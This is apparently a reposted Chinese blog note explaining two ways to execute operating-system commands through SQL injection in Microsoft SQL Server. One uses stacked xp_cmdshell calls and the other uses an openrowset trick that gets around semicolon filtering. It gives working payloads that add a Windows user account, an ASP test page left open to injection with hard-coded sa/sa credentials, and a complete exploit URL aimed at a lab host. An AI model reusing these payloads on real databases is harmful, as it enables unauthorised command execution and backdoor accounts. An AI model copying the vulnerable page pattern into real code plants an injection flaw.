MSSQL注入两种执行命令的方法
栏目: 数据库 · SQL Server · 发布时间: 6年前
内容简介:MSSQL注入两种执行命令的方法
以前遇到了一个站,Php+Mssql,不能多语句执行,就是找不到不用多语句来执行命令的方法。
其实大牛早就玩烂的东西,在自己博客做个总结笔记。
1.能多语句。
;exec xp_cmdshell('net user luan$ lu4n.com /add');--
这个方法应该都知道,没什么可说的,图也不配了。
2.不能多语句。
这个不能多语句的原因,可能是网站过滤了分号,也可能是连接数据库的时候就限制了不能多语句执行。反正以前就是觉得很蛋疼的情况了。
select * from openrowset('sqloledb','trusted_connection=yes','set fmtonly off exec master..xp_cmdshell ''net user luan lu4n.com /add''')
这种情况,只要能带入下面这个 sql 语句即可调用xp_cmdshell,或者其他的存储过程
而且这方法还能得到执行命令的回显。
我的测试环境:
Win2003
IIS6
SqlServer 2000
mssqli.asp:
<% dim sql sql ="select * from spt_values where name='"&request("name")&"'" sql = replace(sql,";","") set conn=server.createobject("adodb.connection") conn.open "provider=sqloledb;source=local;uid=sa;pwd=sa;database=master" set rs=server.createobject("adodb.recordset") rs.open sql,conn,3,2 Do While not rs.EOF response.write rs("name") rs.MoveNext Loop rs.close() conn.close() %>
测试前:
exp1:
http://192.168.52.136/mssqli.asp?name=rpc'and 'lu4n.com'=(select * from openrowset('sqloledb','trusted_connection=yes','set fmtonly off exec master..xp_cmdshell ''net user luan lu4n.com /add'''))--
截图:
看截图是报错了,但是子查询已经完成了,命令已经执行了,只是直接这样子拿不到回显。报错注入如何回显可以参考大牛的 文章
测试后:
sqlmap最新版里居然没有这个方法,而我在国内的很老的文章里就看到了这个方法…
sqlmap里有个功能mssql注入能切换身份来执行sql语句,但是需要其他用户的账号密码。
以上所述就是小编给大家介绍的《MSSQL注入两种执行命令的方法》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。